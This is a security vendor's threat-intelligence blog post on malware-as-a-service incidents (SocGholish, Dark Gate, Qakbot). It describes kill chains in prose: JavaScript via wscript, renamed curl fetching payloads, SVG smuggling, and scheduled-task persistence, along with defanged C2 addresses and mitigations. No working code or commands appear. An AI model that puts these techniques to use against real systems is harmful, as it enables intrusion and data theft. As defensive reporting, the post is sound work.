Between November 27 and December 04, 2024, Blackpoint’s Security Operations Center (SOC) responded to 522 total incidents across on-premises, Microsoft 365, and Google Workspace protected environments. Throughout November 2024, Blackpoint’s SOC has responded to several alerts that have been related to multiple Malware-as-a-Service (MaaS) variants.

In this blog, we’ll dive into these observations, why they matter for our partners, and possible mitigations using your existing tech stack alongside Blackpoint Cyber’s managed services.

Malware-as-a-Service (MaaS)

Topline Takeaways

  • Industry target:
    • Consumer Cyclicals
    • Industrials
    • Institutions & Organizations
    • Professional & Commercial Services
    • Real Estate
  • Blackpoint SOC actions:
    • Isolated impacted devices
    • Contacted partner
  • Attacker methods:
    • JavaScript files
    • Wscript to run scheduled tasks
  • Recommended mitigations:
    • Minimize or restrict the use of scripting languages.
    • Employ least-privilege access controls.
    • Regularly audit both environment and endpoints.

Incident Timelines

Over the previous 30 days, Blackpoint’s SOC has routinely thwarted incidents from threat actors attempting to deploy malware-as-a-service (MaaS) variants – SocGholish, Gootloader, Qakbot, and Dark Gate. On November 22, 2024, we covered threat hunting activities conducted by Blackpoint’s SOC related to Gootloader infections. Blackpoint’s SOC was able to successfully remove these threats and work alongside partners to mitigate malicious activities and remote malware related persistence mechanisms.

SocGholish

In early November 2024, Blackpoint’s SOC conducted threat hunting to search for suspicious JavaScript files being executed and run from web browser processes, a trend that Blackpoint’s SOC has observed. While conducting the threat hunt, Blackpoint’s SOC observed a device of an industrials partner running a wscript.exe process with JavaScript files. Additionally, Blackpoint’s SOC identified a network callout from wscript.exe to an IP address, 205.185.119[.]10, which has been linked to SocGholish command and control (C2) servers.

In early November 204, Blackpoint’s MDR technology alerted our SOC to the execution of a suspicious JavaScript file that was downloaded and executed on the host of an institutions & organizations partner. Additionally, Blackpoint’s SOC identified remote connections to an IP address, 88.119.175[.]152, which has been linked to SocGholish campaigns.

In mid-November 2024, Blackpoint’s MDR technology alerted to suspicious PowerShell executions on the host of a real estate partner. Upon investigation, Blackpoint’s SOC identified a malicious PowerShell command that called out to a domain to install and execute a .svg file, which is indicative of SVG smuggling – a known technique utilized by SocGholish malware. Additional analysis revealed that the threat actor also installed AsyncRAT and utilized BOINC as a C2 server. Blackpoint’s SOC isolated impacted machines to avoid additional malicious behavior and potential lateral movement.

Dark Gate

In mid-November 2024, Blackpoint’s MDR technology alerted to the execution of a JavaScript file, which was located within a downloaded .zip file, on the host of a professional & commercial services partner. The first step of the malware’s kill chain was to copy curl.exe to a temp folder and renamed the binary. Curl was then used to download a fake PDF file that was utilized to social engineer the user into thinking that they accessed a legitimate file. Curl was finally utilized to download a .a3x file, which is an Autoit3 script meant to add an encrypted registry value on the host. The registry value was meant to be injected into a legitimate process. The result was a callout to the threat actor’s infrastructure. Blackpoint’s SOC isolated the affected host to prevent lateral movement and worked with the partner to remove persistence mechanisms.

In late November 2024, Blackpoint’s MDR technology alerted to the execution of a JavaScript file, again located within a downloaded .zip file on the host of a real estate partner. The malware’s kill chain was nearly identical to the incident above. Blackpoint’s SOC did not observe any signs of lateral movement or further compromise, and the affected host was isolated.

Qakbot

In late November 2024, Blackpoint’s MDR technology alerted to suspicious PowerShell activity on the host of a processional & commercial services partner. Analysis of the alert found that a TvMusic.vbs file was the source of the alert. The file was located in the user’s music folder. When the .vbs file was executed, it read the text contents of C:\Users\Public\Music\TvMusic.music and executed the contents into the device’s memory and created two scheduled tasks (TvMusic) and (TvMusic2). This activity is consistent with Qakbot infections. Blackpoint’s SOC isolated the affected host and removed malicious persistence mechanisms.

More About MaaS

Malware-as-a-Service (MaaS) is a business model used by malicious actors, similar to how organizations can utilize software-as-a-service (SaaS), threat actors can purchase and/or rent malware variants that can be used during cyberattacks. MaaS operators often advertise their variants and already obtained accesses on cybercriminal forums. Threat actors then have the option of paying for access to the malware variant themselves to launch their own campaigns or paying for access that has already been achieved.

Threat actors likely find this type of service attractive because it allows threat actors of all skill level to conduct malicious activity, creates less work for malware operations – such as ransomware – and the wide array of capabilities these tools possess, which includes:

  • Stealing sensitive information, including credentials,
  • Gaining persistent access to targeted victims,
  • Deploying other malware payloads, including information stealers and ransomware;
  • Sophisticated defense evasion techniques.

The MaaS model results in malware variants being distributed by multiple threat actors and groups, which can make post-incident attribution more difficult. These operations highlight the need for in-depth, proactive security solutions.

APG Threat Analysis for MaaS Variants

Blackpoint’s Adversary Pursuit Group (APG) predicts the continued use of MaaS operations over the next 12 months.

This assessment is supported by Blackpoint’s SOC observed incidents, which include the use of Dark Gate, Qakbot, and more throughout 20242 as well as external reporting detailing the use of MaaS variants. In August of 2024, ReliaQuest researchers reported that SocGholish and Gootloader accounted for 90% of infections they observed in 2024.

Additionally, DarkTrace researchers reported that in the first half of 2024 MaaS operations were a prevalent threat to their customers.

Mitigations

  • Minimize the use of – or implement strict controls on – scripting languages, as threat actors often rely on scripting languages, such as JavaScript, to deploy malware and conduct malicious activities.
  • Employ least-privilege access controls to ensure that users only have access to the data and resources required to complete their job functions.
  • Regularly audit both environment and endpoints to identify potential rogue applications and potential old/unused accounts that should be removed.

Conclusion

These incidents underscore the evolving tactics of threat actors and highlight the importance of layered defenses. By leveraging Blackpoint’s MDR technology and following these mitigation strategies, you can bolster your organization’s defenses against these types of attacks. Reach out to Blackpoint’s SOC team for tailored recommendations on how to enhance your cybersecurity posture.

Date Published
Dec 6, 2024

By
Blackpoint Cyber

Subscribe to the Blackpoint Blog

Don’t let a lack of awareness leave the organizations you protect vulnerable to sophisticated and elusive attacks. Subscribe now for a weekly roundup of Blackpoint’s empowering articles.

Subscribe now!